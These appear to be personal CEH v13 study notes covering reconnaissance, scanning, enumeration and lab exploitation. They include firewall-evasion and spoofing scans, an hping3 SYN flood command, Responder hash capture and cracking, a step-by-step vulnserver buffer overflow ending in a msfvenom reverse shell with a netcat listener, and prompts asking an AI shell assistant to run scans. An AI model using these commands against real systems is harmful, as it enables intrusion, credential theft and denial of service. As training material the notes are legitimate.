CEH-V13-Notes

Footprinting and Reconnaissance

Google Search Engines

Popular Google advanced search operators :~
- site:
- filetype:
- allinurl:
- inurl:
- intext:
- allintitle:
- intitle:
- inanchor:
- allinanchor:
- cache:
- link:
- location:
Some Websites For Research Puspose :~
- Google Hacking Database(Exploits Database)
  - Reconnaissance — find exposed pages, directories and entry points
  - Sensitive-data discovery — locate leaked credentials, backups, config files, logs
  - Attack-surface mapping — understand what an attacker could reach
```
    https://www.exploit-db.com/google-hacking-database
```
- Shodan
  - Asset discovery — find internet-connected devices (cameras, routers, servers)
  - Exposure detection — spot devices with open ports or default/weak configs
  - Vulnerability spotting — identify services with known CVEs from banners
  - Threat intelligence — see attacker-accessible targets and trends
```
    https://www.shodan.io/dashboard
```

Internet Research Services

Finding a top level domains and Sub Domains :~
- Netcraft
  - Hosting & IP info — current IP(s), ASN, and hosting provider
  - Server software & headers — web server (Apache, nginx, IIS), versions (if visible), HTTP headers
  - SSL/TLS details — cert issuer, expiry, SANs (subject alt names)
  - Technology hints — detected web technologies, frameworks, CMS (sometimes)
  - Phishing / takedown reports — Netcraft tracks phishing reports and can flag malicious sites
  - Reverse IP / virtual hosts — what other domains are hosted on the same IP (shared hosting)
  - Risk/Threat intelligence — in some paid tiers you get richer threat signals and aggregator data
```
    https://www.netcraft.com/platform/threat-intelligence/reporting-and-dashboards
```
- using this to find list of DNS Servers, MX Records, Host Record (A) and GEOIP
```
      https://dnsdumpster.com/
```

Social Network Sites

TheHarvester :~
- Purpose: Passive information gathering / OSINT
- Finds: email addresses, hostnames, subdomains, virtual hosts, employee names, and URLs from public sources
- When to use: Early in reconnaissance/footprinting to enumerate targets and gather leads for further (authorized) testing
Buzzsumo :~
- Monitor public mentions (your company, products, executives)
- Detect possible leaks / impersonations early
- Collect OSINT for phishing or threat-intel training
```
    https://buzzsumo.com
```
Nmap :~
- Nmap (Network Mapper) is an open-source security tool used to discover hosts and services on a computer network by sending packets and analyzing the responses
  - It shows what devices are on a network
  - Which ports/services they’re running
  - And helps test security & firewall rules
- Nmap Types :~
  - Host-discovery / basic
    - Ping scan (-sn) — discover live hosts without port scanning
      - Example: nmap -sn 192.168.1.0/24
  - TCP scans
    - SYN scan (half-open) (-sS) — fast, stealthy; preferred for stealthy port discovery
      - Example: nmap -sS 10.0.0.5
    - Connect scan (-sT) — uses full TCP connect(); use when you lack raw-socket privileges
      - Example: nmap -sT 10.0.0.5
    - TCP ACK (-sA) — map firewall rules / determine if ports are filtered
      - Example: nmap -sA target.com
    - Idle (Zombie) scan (-sI) — highly stealthy, uses a third-party "zombie" host to probe target
      - Example: nmap -sI zombie_ip target_ip
  - Special TCP flag scans (evade/troubleshoot)
    - FIN (-sF), NULL (-sN), Xmas (-sX) — firewall evasion / fingerprinting legacy stacks
      - Example: nmap -sF target.com
  - UDP & other protocol scans
    - UDP scan (-sU) — find UDP services (slower, noisy)
      - Example: nmap -sU -p 53,161 target.com
    - IP protocol scan (-sO) — discover which IP protocols (ICMP, IGMP, etc.) are supported
      - Example: nmap -sO target.com
  - Service & OS detection
    - Service/version detection (-sV) — identify service names and versions
      - Example: nmap -sV target.com
    - OS detection (-O) — attempt OS fingerprinting
      - Example: nmap -O target.com
    - Aggressive (-A) — OS + version + script scan + traceroute (all-in-one, noisy)
      - Example: nmap -A target.com
  - Scripting & vulnerability scans
    - NSE scripts (--script) — run scripts for discovery, vulnerability checks, brute force, etc
      - Example: nmap --script=vuln target.com or nmap --script=default,safe target.com
    - Service-specific scripts (e.g., --script smb*) — targeted checks
  - Scanning controls / evasion
    - Port range / all ports (-p 1-65535 or -p-) — scan specific or all ports
    - Disable host discovery (-Pn) — treat hosts as up (useful when ping is blocked)
    - Timing templates (-T0..-T5) — slow stealth (-T0) to fast (-T5)
    - Fragmentation (-f) / decoys (-D) / spoofing — evasion/obfuscation techniques (can be noisy or hostile)
  - IPv6 and other modes
    - IPv6 scanning — Nmap supports IPv6 targets (use IPv6 address directly)
    - SCTP scan (--sctp) — scan SCTP services if needed
Sherlock :~
- commad:
```
      sherlock "search_any_names_anything"
```
- Sherlock is an open-source OSINT tool written in Python that helps you find usernames across many social networks and websites automatically
  - Username enumeration
  - Digital footprinting
  - Investigation support
  - Reconnaissance for red-team/social engineering
Social researcher :~
- to gather additional information related to the target company and its employees from social networking sites
- website:
```
      https://www.social-searcher.com
```

Whois Lookup Using Domain Tools

Details About Whois Domain Tool :~
- A WHOIS domain tool is an online service or command-line utility that lets you look up the public registration information of a domain name or IP address from WHOIS databases
  - Identify domain owners — find the registrant/organization behind a domain (unless privacy-protected)
  - Gather contact info — email/phone of the registrar or abuse contacts
  - Timeline checks — see when the domain was created/updated/when it expires
  - Detect suspicious domains — compare registration dates, patterns, and registrars to spot phishing or fake sites
  - Map infrastructure — see related domains, name servers, IPs
  - Incident response — get registrar abuse contacts to report malware or phishing
```
    https://whois.domaintools.com/
```
IP2Location :~
- IP2Location is a commercial / database & API service that maps an IP address to geographic and related metadata (country, region, city, ISP, latitude/longitude, time zone, proxy/VPN flags, ASN, domain, etc.)
```
    https://www.ip2location.com/
```

DNS Information using nslookup

DNSDumpster :~
- A free web-based reconnaissance tool that enumerates a domain’s DNS records and public attack surface and visualizes relationships (subdomains → IPs → netblocks). It scrapes DNS, CRT logs, public DNS servers, and passive sources to build a domain map
  - Quick subdomain discovery — find subdomains that might be forgotten (dev, staging, old service
  - DNS record snapshot — see A, AAAA, MX, NS, TXT, SOA, and PTR records in one view
  - Mapping & visualization — network graph showing hosts, IPs, and associated netblocks (great for reports)
  - Email infrastructure checks — reveals MX servers and mail hosts you should verify (SPF/DMARC gaps)
  - Public exposure spotting — discover exposed services, cloud-hosted assets and orphaned hosts
  - Triage & prioritization — fast way to find high-risk targets for further assessment (shodan, nmap)
  - Evidence for incident response — timeline / snapshot useful when investigating domain-related incidents
```
        https://dnsdumpster.com/
```
nslookup(using in cmd) :~
- A command-line tool to query DNS records for a domain or IP
- commands
  - nslookup
  - set type=a (a=A record)
  - www.certifiedhacker.com(domain name)
  - set type=cname
  - certifiedhacker.com(non-authoritative name)
  - set type=a(if we wnt the primary email ip address u can use it again)
  - enter primary email address
- for example DNS records:
  - mx = for mail
  - ns = for servers
  - a = for ipv4
  - aaaa = for ipv6
Kloth.net(website for nslookup and searching records) :~
- Kloth.net is an online DNS lookup tool that allows users to query various DNS record types (A, MX, TXT, NS, etc.) for any domain from an external resolver, useful for passive reconnaissance and troubleshooting
```
   https://www.kloth.net/
```
MXtoolbox(Find Domain Name) :~
- MXToolbox is a free/commercial online toolkit for checking and troubleshooting email, DNS, and network services. It started as a “Mail eXchanger (MX) lookup” tool but now includes many tests
  - DNS lookups — A, AAAA, MX, TXT, SPF, DKIM, DMARC records
  - Blacklist checks — see if an IP/domain is on spam or malware blocklists
  - SMTP diagnostics — test mail servers, open relays, and routing problems
  - Domain health audits — one-click scan for common misconfigurations
  - Traceroute & ping — quick reachability tests
  - Whois / ASN info — see registrar and network details
  - Monitoring — continuous alerts if your mail server or DNS goes down or gets blacklisted
```
    https://mxtoolbox.com/SuperTool.aspx?action=a%3agoogle.com&run=toolpage#
```
DNS Record Types :~
- A - Maps a hostname to an IPv4 address
- AAAA - Maps a hostname to an IPv6 address
- CNAME - Canonical Name — alias one name to another (e.g. www → example.com)
- MX - Mail eXchanger — tells which servers handle email for the domain
- NS - Name Server — lists the authoritative DNS servers for the domain
- SOA - Start of Authority — contains admin info, serial numbers, refresh times for the zone
- TXT - Free-text data; commonly used for SPF, DKIM, DMARC, verification tokens

Tracing Emails using eMailTrackerPro

eMailTrackerpro :~
- EmailTrackerPro is a web/email-tracking service that lets you track emails — who opened them, when, from what IP/location, which device, and what links were clicked. It usually works by embedding tracking pixels or tracked links in outgoing messages
```
       https://emailtrackerpro.en.softonic.com/
```

Footprinting a Target using Recon-ng

Reon-ng :~

Recon-ng is an open-source web reconnaissance framework that automates OSINT gathering, helping security professionals collect, organize, and analyze information about domains, hosts, and people

- some commands
  - recon-ng  -  (for opening the recon in terminal)
  - marketplace install all  -  (where we are install all modules what we need)
  - workspace create workspacename  -  (this command we use for creating the workspace)
  - workspace load workspacename  -  (used for load existing workspace)
  - workspace remove workspacename  -  (for remove existing workspace)
  - db intert domains  -  (used to add the domain name)
  - modules load modulesname  -  (used for load the modules)
  - back  -  (used to come back to the privious module)
- modules:
  - recon/domains-hosts/brute_hosts (to harvest the hosts)
    - run
  - modules load recon/domains-hosts/bing_domain_web
    - run
  - recon/hosts-hosts/reverse_resolve (for reverse lookup)
    - run
    - show host
  - reporting/html (creating report)
    - options set FILENAME /filepath/filename.html   
    - options set CREATOR [your name]
    - options set CUSTOMER [customer name]
    - run
  - recon/domains-contacts/whois_pocs(for uses the ARIN Whois RWS to harvest POC data)
    - options set SOURCE facebook.com
    - run
  - recon/domains-hosts/hackertarget (To extract a list of subdomains and IP)
    - options set SOURCE <domain_name>
    - run

using sgpt

sgpt :~

sgpt is a small CLI (command-line) tool that lets you talk to OpenAI’s GPT (ChatGPT) from your terminal. It’s basically a wrapper around the OpenAI API.

commands:

     sgpt --chat footprint --shell "Use theHarvester to gather email accounts associated with 'microsoft.com', limiting results to 200, and leveraging 'baidu' as a data source"

     sgpt --chat footprint --shell "Use Sherlock to gather personal information about 'Sundar Pichai' and save the result in recon2.txt"

     sgpt --chat footprint --shell "Install and use DNSRecon to perform DNS enumeration on the target domain www.certifiedhacker.com"

     sgpt --chat footprint --shell "Perform network tracerouting to discover the routers on the path to a target host www.certifiedhacker.com"

     sgpt --chat footprint --shell "Develop a Python script which will accept domain name microsoft.com as input and execute a series of website footprinting commands, including DNS lookups, WHOIS records retrieval, email enumeration, and more to gather information about the target domain"

Footprinting and Reconnaissance all tools in one frame

Google dorks — like a metal detector that finds sensitive scraps buried in Google’s search results
Google exploits (GHDB) — a cookbook of proven search recipes attackers use to uncover exposed secrets
Shodan — a search engine that treats the Internet like a city and shows you every unlocked door and window
Netcraft — a historical ledger that tells you who built a website, where it’s hosted, and how its ownership moved over time
TheHarvester — a digital trawl net that scoops up public emails, hosts, and subdomains from the open web
BuzzSumo — a social barometer that shows which headlines and posts make people react and share
Nmap — an X-ray machine for networks that reveals which services and ports are alive under the skin
Sherlock — a social media bloodhound that sniffs out where a username appears across the web
Whois / DomainTools — the domain’s ID card showing who registered it and when
IP2Location — a map app that pins an IP to a rough geographic and network address
nslookup — a quick phonebook query to ask DNS “what’s the address for this name?”
MXToolbox — a Swiss Army knife for checking email and DNS health at a glance
Meltigo — (aggregator-style tool) a quick index that gathers scattered public traces of an email/username into one view
Recon-ng — a modular assembly line that automates OSINT tasks and produces organized recon outputs
DNS Dumpster — a satellite snapshot that maps a domain’s DNS landscape and forgotten subdomains
Kloth.net — a simple external DNS lookup window you can use when your local resolver lies to you
EmailTrackerPro — a tracker’s motion sensor that logs when an email is opened and from roughly where
sgpt — a terminal-based assistant that brings ChatGPT into your shell like a pocket consultant

Scanning Networks

Explain Network scanning concepts

concepts :~
- URG - Urgent
- PUSH - push
- ACK - Acknownledgment
- FIN - finish
- RST - reset
- SYN - synchronice

Scanning Techniques for Host Discovery

using Nmap :~
- ICMP ping scan
  - ICMP Echo ping - nmap -sn -PE
    - ICMP Echo ping sweep
  - ICMP timestamp ping - nmap -sn -PP
  - ICMP address mak ping - nmap -sn -PM
- ARP ping scan - nmap -sn -PR
- UDP ping scan - nmap -sn -PU
- TCP ping scan
  - TCP SYN ping - nmap -sn -PS
  - TCP ACK ping - nmap -sn -PA
- IP protocal ping scan - nmap -sn -PO
- Ping sweep tools
  - Angry ip Scanner
  - Advance ip scanner

Scanning Techniques for Port and services

port scanning techniques using Nmap :~
- TCP Scanning
  - TCP full open scan - nmap -sT -v
  - Stealth TCP scanning methods
    - Half-open scan - nmap -sS -v
    - Inverse TCP flag Scan - nmap -(sF, sN, sX) -v
      - Xmas scan - nmap -sX -v
      - FIN scan - nmap -sF -v
      - NULL scan - nmap -sN -v
    - ACK flag probe scan - nmap -sA -v
      - TTL-based scan - nmap -sA -ttl 100 -v
      - window scan - nmap -sA -sW -v
  - IDLE/IPID header scan - nmap -Pn -p- -sl
- UDP scanning
- SCTP scanning
  - SCTP INIT scanning - nmap -sY -v
  - SCTP Cookie ECHO scanning - nmap -sZ -v
- SSDP scanning
- IPv6 scanning
- service version discovery - nmap -sV
- tool:
  - zenmap(you can use zenmap in windows as well as nmap in linux terminal)

Scanning techniques for OS Discovery

Identify Target system OS :~
- Linux = TTL(Time to live)-64
- FreeBSD = TTL(Time to live)-64
- OpenBSD = TTL(Time to live)-255
- windows = TTL(Time to live)-128
- Cisco Routers = TTL(Time to live)-255
- Solaries = TTL(Time to live)-255
- AIX = TTL(Time to live)-255
- Command for OS Discovery :~ nmap -O
- nmap --script smb-os-discovery.nse

Scanning Beyond IDS/Firewall using evasion Techniques

Packet Fragmentation = nmap -f
Source Routing
Source port manupulation = nmap -g
IP Address Decoy
- nmap -D RND(random namber of decoys):10
- nmap -D decoy1, decoy2, decoy3,...etc
IP Address Spoofing
- using Hping3 for ip address spoofing = Hping3 www.certifiedhacker.com -a
MAC Address Spoofing = nmap -sT -Pn --spoof-mac <range like 0,1,2....>
Creating Custom
Randomaizing host order and sending Bad checksums
- randomized host order = nmap --randomize-hosts
- sending bad checksums = nmap --badsum
Proxy Servers
Anonymizers
wireshark one filter = ip.src ==

Scan a Target Network Using Metasploit

Metasploit :~

commands :

           sudo su
           msfconsole
           nmap -Pn -sS -A -oX test <target ip range>
           search <module name portscan>
           use <module name portscan syn>
           set INTERFACE eth0
           set PORTS 80
           set RHOSTS <ip range>
           set THREADS 50 or 10
           run

Scan a Target using ShellGPT

      sgpt --chat scan --shell "Use hping3 to perform ICMP scanning on the target IP address 10.10.1.11 and stop after 10 iterations"

      sgpt --chat scan --shell "Run a hping3 ACK scan on port 80 of target IP 10.10.1.11"

      sgpt --chat scan --shell "Scan the target network 10.10.1.0/24 for active hosts and place only the IP addresses into a file scan1.txt"

      sgpt --chat scan --shell "Run a fast but comprehensive nmap scan against scan1.txt with low verbosity and write the results to scan2.txt"

      sgpt --chat scan --shell "Use nmap to perform ICMP ECHO ping sweep on the target network 10.10.1.0/24"

      sgpt --chat scan --shell "Use nmap to find open ports on target IP 10.10.1.11"

      sgpt --chat scan --shell "Perform stealth scan on target IP 10.10.1.11 and display the results"

      sgpt --chat scan --shell "Perform an XMAS scan on target IP 10.10.1.11"

      sgpt --chat scan --shell "Use Nmap to scan for open ports and services against a list of IP addresses in scan1.txt and copy only the port, service and version information with the respective IP address to a new file called scan3.txt"

      sgpt --chat scan --shell "Use Metasploit to discover open ports on the IP address 10.10.1.22"

      sgpt --chat scan --shell "Use Nmap to scan open ports, MAC details, services running on open ports with their versions on target IP 10.10.1.11"

      sgpt --chat scan --shell "Use TTL value and identify the operating system running on the target IP address 10.10.1.11, display the TTL value and OS"

      sgpt --chat scan --shell "Use TTL value and identify the operating system running on the target IP address 10.10.1.9, display the TTL value and OS"

      sgpt --chat scan --shell "Use Nmap script engine to perform OS discovery on the target IP addresses in scan1.txt"

      sgpt --chat scan --shell "Develop a script which will automate network scanning efforts and find out live systems, open ports, running services, service versions, etc. on target IP range 10.10.1.0/24"

      sgpt --chat scan --shell "To evade an IDS/Firewall, use IP address decoy technique to scan the target IP address 10.10.1.22"

      sgpt --chat scan --shell "Within scan1.txt file remove 10.10.1.14 and 10.10.1.13 entries, then display results"

      sgpt --chat scancode --code "Create a python script to run a fast but comprehensive Nmap scan on the IP addresses in scan1.txt and then execute vulnerability scanning using nikto against each IP address in scan1.txt"

Hping

its a network scanning tool and command-line tool

hping command:

ICMP ping
```
     hping3 -1 10.0.0.25
```
ACK scan on port 80
```
     hping3 –A 10.0.0.25 –p 80
```
UDP scan on port 80
```
     hping3 -2 10.0.0.25 –p 80 
```
Collecting Initial Sequence Number
```
     hping3 192.168.1.103 -Q -p 139
```

Firewalls and Timestamps

     hping3 -S 72.14.207.99 -p 80 --tcp-timestamp

SYN scan on port 50-60

     hping3 -8 50-60 –S 10.0.0.25 –V

FIN, PUSH and URG scan on port 80

     hping3 –F –P –U 10.0.0.25 –p 80

Scan entire subnet for live host

     hping3 -1 10.0.1.x --rand-dest –I eth0

Intercept all traffic containing HTTP signature

     hping3 -9 HTTP –I eth0

SYN flooding a victim

     hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

Hping Scan with AI :~

     Use Hping3 to perform ICMP scanning on the target IP address 10.10.1.11 and stop after 10 iterations

     Run an hping3 ACK scan on port 80 of target IP 10.10.1.11

Enumeration

NetBIOS Enumeration

Netbios :~ netbios = network basic input and output system(port 137,138,139)
NetBIOS Enumeration using Windows Command-Line Utilities :~
- Commands:
  - net(this is for netbios help)
  - nbtstat -a
    - -a = displays the NetBIOS name table of a remote computer
  - nbtstat -c
    - -c = lists the contents of the NetBIOS name cache of the remote computer

Techniques for SNMP Enumeration and LDAP Enumeration

SNMP = Simple Network Managment Protocol(port 161,162)
- command :
  - snmpwalk -v1 -c public
  - nmap -sU -p 161 --script=snmp processes
SNMP Enumeration using SnmpWalk :~

     nmap -sU -p 161 --script=snmp-sysdescr <target ip>  
     nmap -sU -p 161 --script=snmp-processes <target ip>
     nmap -sU -p 161 --script=snmp-win32-software <target ip>
     nmap -sU -p 161 --script=snmp-interface <target ip>

SNMP Enumaretion using SNMPwalk with SGPT :~
LDAP = Lightweight Directory Access Protocal :~
- Using Active Directory Explorer (AD Explorer):
  - Tool: Active Directory Explorer

Techniques for NTP and NFS Enumaretion

NTP = Network Time protocal
NFS = Network File System

NFS Enumeration using RPCScan and SuperEnum :~

NFS is for server to server file trasfor
superenum commands:

    //make your user into superuser
    sudo su

    //you should make your current directory to superenum directory
    cd superenum

    nmap -p 2049 <target ip>

    //we should create one .txt file with target ip address
    echo "10.10.1.19">><txt file name with .txt>

    //this is for run the superenum
    ./superenum

    //after run the superenum we have to type the doc name or file name
    filename.txt
    
    //we complete the superenum and exit from superenum directory
    cd ..

RCP Scan Commands:

    cd RPCscan(we sholud make your current directory to RPCscan directory)
    python3 rpc-scan.py <target ip> --rpc

Demonstrate IPSec, VoIP, RPC, LInux/Unix, SMB

IPSec = Internet Protocal Security
VoIP = Voice Over Internet Protocal
RPC = Remote Proedure Call
SMB = Server Message Block(port TCP 445)

//Additional info:

SAMBA = its used in linux/unix operating system and used for converting or help in file sharing and printers from one OS to Another OS like windows OS to Linux OS.

DNS Enumeration using Zone Transfer

A DNS Zone Transfer is a mechanism used to copy DNS records from one DNS server (usually the master/primary) to another (secondary).

before we go for zone transfer first find out the Authoritative name sever for sending request
commands:

     dig ns <domain name>
       dig = Domain Information Groper(this is a command in dns zone transfer in linux os system)
       NS = Name server

     dig @<server_name> <domain_name> <service>
     for example: dig @example.com www.certifiedhacker.com axfr
       @ = the @ symbol is used to specify the DNS server
       AXFR = A-Authoritative, XFR-transfer  

    //whether its fails go to windows server and perform nslookup in command promt
    nslookup
    set querytype=soa
    <domain_name>

    //whether it fails use this and make primary server into Authoritative server
    ls -d <primary server name>

SMTP Enumeration using Nmap

SMTP = Simple Mail Transfer Protocal
Port = 25

commands:

 nmap -p 25 --script=smtp-enum-users <target_ip>

 nmap -p 25 --script=smtp-open-relay <target_ip>

 nmap -p 25 --script=smtp-commands <target_ip>

Enumerate Information using Global Network Inventory and shellGPT

Enumerate Information using Global Network Inventory :~
- It’s a complete list (database) of all devices, systems, IPs, and services that exist on an organization’s entire network — across all branches, cloud, and local servers
Tool: Global Network Inventory

  https://github.com/zeroday-studio/CEH-V13-notes.git

Enumeration Using SGPT :~
- sgpt --shell "Perform NetBIOS enumeration on target IP 10.10.1.11"
- sgpt --shell "Get NetBIOS info for IP 10.10.1.11 and display the associated names"
- sgpt --shell "Enumerate NetBIOS on target IP 10.10.1.22 with nmap"
- sgpt --chat enum --shell "Perform SNMP enumeration on target IP 10.10.1.22 using SnmpWalk and display the result here"
- sgpt --chat enum --shell "Perform SNMP enumeration on target IP 10.10.1.22 using nmap and display the result here"
- sgpt --chat enum --shell "Perform SNMP processes on target IP 10.10.1.22 using nmap and display the result here"
- sgpt --chat enum --shell "Perform SMTP enumeration on target IP 10.10.1.19."
- sgpt --chat enum --shell "Use Nmap to perform DNS Enumeration on target domain www.certifiedhacker.com"
- sgpt --chat enum --shell "Use dig command to perform DNS cache snooping on target domain www.certifiedhacker.com using recursive method. Use DNS server IP as 162.241.216.11"
- sgpt --chat enum --shell "Use dig command to perform DNS cache snooping on the target domain www.certifiedhacker.com using non-recursive method. Use DNS server IP as 162.241.216.11"
- sgpt --shell "Perform IPsec enumeration on target IP 10.10.1.22 with Nmap
- sgpt --shell "Scan the target IP 10.10.1.22 for the port using SMB with Nmap"
- sgpt --chat enum --shell "Develop and execute a script which will automate various network enumeration tasks on target IP range 10.10.1.0/24"

Vulnerability Analysis

Summarize Vulnerability Assessment Concepts

Classification of vulnerability :~
- Mis/Weak Configuration
- Application Flaws
- poor path Managment
- Design Flaws
- Third-Party risks
Vulnerability Scoring Systems and Database :~
- CVSS = Common Vulnerability Scoring System
  - none - 0.0
  - Low - 0.1-3.9
  - Medium - 4.0-6.9
  - High - 7.0-8.9
  - Critical - 9.0-10.0
- CVE = Common Vulnerability and Exposure
- NVD = National Vulnerability Database
  - this is USA based Repository
- CWE = Common Weakness Enumeration
Vulnerability Management Lifecycle :~
- Pre-Assessment phase
  - Identify Assets: we have to list which is very important in our network or our organization
  - Create a baseline: taking a snapshot of your systems current health before you start fixing anythig
- Vulnerability Assessment phase
  - Vulnerability Scan: we have to scan our network or organization's vulnerability before we going to fix something
  - Vulnerability Analysis: we have to analys the vulnerability what we scan
- post-assessment phase
  - Risk Assessment: Process of analysing and Prioritizing the vulnerabilities you discoverd and make sure which vulnerability containing more risk and we will go through that first
  - Remidiation: this step is for fixing, patching or removing the bugs in vulnerability
  - verification: we have to verify the process what we done now
  - Monitoring: we have to monitor all steps and all the security option once we done all the steps
Types of Vulnerability Scanning :~
- External Scanning
- Internal Scanning
- Host-Based Scanning
- Network-Based Scanning
- Application Scanning
- Credential Scanning
- Non-Credential Scanning
- Manual Scanning
- Automated Scanning
Analyze Vulnerability Assassment Reports :~
- Executive Summary
- Assessment overview
- findings
- Risk Assessment
- Recommendations
- Appendices and Supporting information
- Conclusion
- follow-up Actions and Timeline
- Glossary of terms

Use Vulnerability Assessment Tools

Tools :~
- Nessus
- Greenbone Security Assistant(OpenVAS)
- Nikto(Coomand-line tool)
- Equixly(AI-Powered Vulnerability Assessment Tool)
- Smart Scanner(AI-Powered Vulnerability Assessment Tool)
- skipfish(command-line tool)
- Qualys
Additional tools :~
- InsightVM (https://www.rapid7.com)
- Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
- Nexpose (https://www.rapid7.com)
- Sniper (https://sn1persecurity.com)
- Tripwire IP360 (https://www.tripwire.com)
- SAINT Security Suite (https://www.carson-saint.com)
- BeSECURE (https://www.beyondsecurity.com)
- Core Impact Pro (https://www.coresecurity.com)
- Intruder (https://www.intruder.io)
- ManageEngine Vulnerability Manager Plus (https://www.manageengine.com)
- Astra Pentest (https://www.getastra.com)
- Skybox (https://www.skyboxsecurity.com)
- MaxPatrol TM (https://www.ptsecurity.com)

Vulnerability Analysis LABS

Vulnerability Research in Common Weakness Enumeration (CWE) :~
- website :
```
    https://cwe.mitre.org
```
Vulnerability Analysis Using OpenVAS :~
- Command: //run this docker command to open the openvas in web browser
```
  docker run -d -p 443:443 --name openvas mikesplain/openvas
```
- website name : Greenbone security assistant //after run the docker command in linux os terminal use this ip address on web browser and after you will get openvas
```
  IP Address: https://127.0.0.1
```
Vulnerability Analysis Using ShellGPT :~

  - sgpt --chat nikto --shell "launch nikto to execute a scan against the url www.certifiedhacker.com to identify potential vulnerabilities."
  - sgpt --chat nikto --shell "Scan the URL https://www.certifiedhacker.com to identify potential vulnerabilities with nikto"
  - sgpt --chat vuln --shell "perform a vulnerability scan on target url http://www.moviescope.com with nmap"
  - sgpt --chat vuln --shell "perform a vulnerability scan on target url http://testphp.vulnweb.com with skipfish"

System Hacking

Gain Access to the System

Perform Active Online Attack to Crack the System's Password using Responder :~
- Responder listens on a network and tricks Windows systems into sending their login hashes, which can then be analyzed or cracked
- we are using Responder tool for crack systems password
- command:
  - open the terminal(linux)
  - sudo responder -I eth0(-I = Interface, eth0 = interface name)
  - go to the windows and login and open any admin login page or and login page
  - come back to the linux and copy jason hash in responder
  - pluma hash.txt(pluma is a text editor in linux)
  - john hash.txt (john is the tool using for crack the password its full name john ripper)
  - john the ripper will give the password in plan text using user hash
Gain Access to a Remote System using Reverse Shell Generator :~
- we using "shared directory (SMB)" for file transfor from host system to target system
- we have to open reverse shell generator using Docker commands and mapping ports of host system port and docker container port
- command:
```
    docker run -d -p 80:80 reverse_shell_generator
```
- lsof -i :80 (shows which process is using port 80 on your system)
  - lsof = list open file
  - -i = internet connection
  - :80 = Filters the result to port 80 only
- http://localhost(to open the reverse shell generator GUI)
- step one is to create payload and listener using MSFVenom in reverse shell generator GUI and listner is msfconsole
- step two is t create payload and listener using Hoaxshell for poweshell in reverse shell generator GUI (in target machine we have run this code in powershell terminal)
Perform Buffer Overflow Attack to Gain Access to a Remote System :~
- Tools we are using:
  - vulnerable server
  - immunity debugger
- EIP = Extended Instruction Pointer
- ESP = Extended Stack Pointer
- in windows run vulnserver.exe as a administrator
- run immune debugger as a administrator and attach vuln server to immune debugger and run this
- sudo su and cd for root directory
```
 //this command is used to make connection between host mechine and target server
  nc -nv <target ip> <target port> 
```
- nc = netcat
- -n = don't resolve the DNS
- -v = verbos
- First step is spiking step using spiking templets:
  - pluma stats.spk
```
  //we are inserting these three line code into stats.spk
    s_readline();
    s_string("STATS ");
    s_string_variable("0");
```
```
    generic_send_tcp <target_ip> <target_port> <stats.spk_file> 0 0
```
  - generic_send_tcp = its a spike templet or tool used to connect the tcp server
  - first 0 = starting position
  - second 0 = delay(there is no delay between packets)
  - after the stats spiking exicution go to windows and check the immune debugger and vulnserver it was vulnerable or not wheather its vuln the immune debugger is pause it is not vuln means running
  - pluma trun.spk
```
  //we are inserting these three line code into trun.spk
    s_readline();
    s_string("TRUN ");
    s_string_variable("0"); 
```
```
    generic_send_tcp <target_ip> <target_port> <trun.spk_file> 0 0
```
  - after the stats spiking exicution go to windows and check the immune debugger and vulnserver it was vulnerable or not wheather its vuln the immunity debugger is pause it is not vuln means running
- Second step is fuzzing using fuzz.py(using python script):
  - using shared directory we will copy script folder from windows to our system
  - go to the network option in our linux
```
    smb://10.10.1.11
  //make your directory as script
    cd /home/attacker/Desktop/Scripts/
    chmod +x fuzz.py
    ./fuzz.py 
  //after this exicution go to windows and check immunity debugger the program is crached but EIP is not overwriten by the python script  
```
  - in this fuzzing method it will say vulnerable server crashed after receiving approximately 10200 bytes of data, but it did not overwrite the EIP register
  - After fuzzing and testing different values, it was found that sending 5100 bytes of data to the vulnerable application overwrites the EIP register.
- Third step is Finding Offset using findoff.py and creating pattern for finding offset(using python script):
  - we get offset here = offset means The point where EIP gets overwritten
  - run as administrator for vuln server and immunity debugger
```
    //before finding offset you have create a pattern
    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 10400
```
  - copy the pattern of 10400 bytes whatever you want you can create and paste it in findoff.py
```
    pluma findoff.py
    chmod +x findoff.py
    ./findoff.py     
```
  - In the Immunity Debugger window, you can observe that the EIP register is overwritten with random bytes. Note down the random bytes in the EIP and find the offset of those byte
  - sudo su in new terminal and cd for root directory
```
    /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 10400 -q 386F4337
```
  - -q = query
  - -l = length
  - you will get offset of that bytes
- Fourth step is Overwrite EIP using overwrite.py:
  - using this method we make sure over EIP offset is correct or not
  - run as administrator for vuln server and immunity debugger
```
    chmod +x overwrite.py 
    ./overwrite.py
```
  - switch to the Windows 11 machine. You can observe that the EIP register is overwritten and EIP is showing as 42424242
  - now we conform our offset is correct
  - now we can go to control the EIP
- Fifth step is identify bad characters(because they may cause issues in the shellcode):
  - bad char might be stop our payloads also
  - run as administrator for vuln server and immunity debugger
```
    chmod -x badchars.py
    ./badchars.py
```
  - In Immunity Debugger, click on the ESP register value -->right click on ESP and Follow in Dump option
  - ofter this there is not bad charectors
- Sixth step is mona method:
  - run as administrator for vuln server and immunity debugger
  - mona helps to identify the right module of the vulnerable server that is lacking memory protection
  - copy mona.py and paste it to C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands
  - in bottom of the immunity debugger you will get text box over their
  - !mona modules(press enter)
  - you can see which module have no memory protection and we will exploit that module inject shellcode and take full control of the EIP register
- Seventh step is converted using converter.py(we get Hex code):
  - run as administrator for vuln server and immunity debugger
```
    sudo su
    cd 
    python3 /home/attacker/converter.py  
    Enter the assembly code here : JMP ESP
  //you will get Hex code
    !mona find -s "\xff\xe4" -m essfunc.dll
  //you get the return address of the vulnerable module  
```
  - In the Immunity Debugger window, click the Go to address in Disassembler icon and Enter expression to follow option and enter the return address in that box
- Eigth step is jump usng jump.py
  - we can use this for jump from EIP to ESP
  - EIP register has been overwritten with the return address of the vulnerable module
```
    chmod +x jump.py
    ./jump.py
```
- Nighth Step is shell code method using shell code method:
  - first we have to create shell code using msfvenom(metasploit)
```
    msfvenom -p windows/shell_reverse_tcp LHOST=[Local IP Address] LPORT=[Listening Port] EXITFUNC=thread -f c -a x86 -b "\x00 
```
  - copy that shell code and paste that code into the shellcode.py
```
    pluma shellcode.py
  //we will run the Netcat command to listen on port in another terminal
    nc -nvlp <host_port>
    chmod +x shellcode.py (in first terminal)
    ./shellcode.py
```
  - in listening port terminal shell access to the target vulnerable server has been established

Perform Privilege Escalation to Gain Higher Privileges

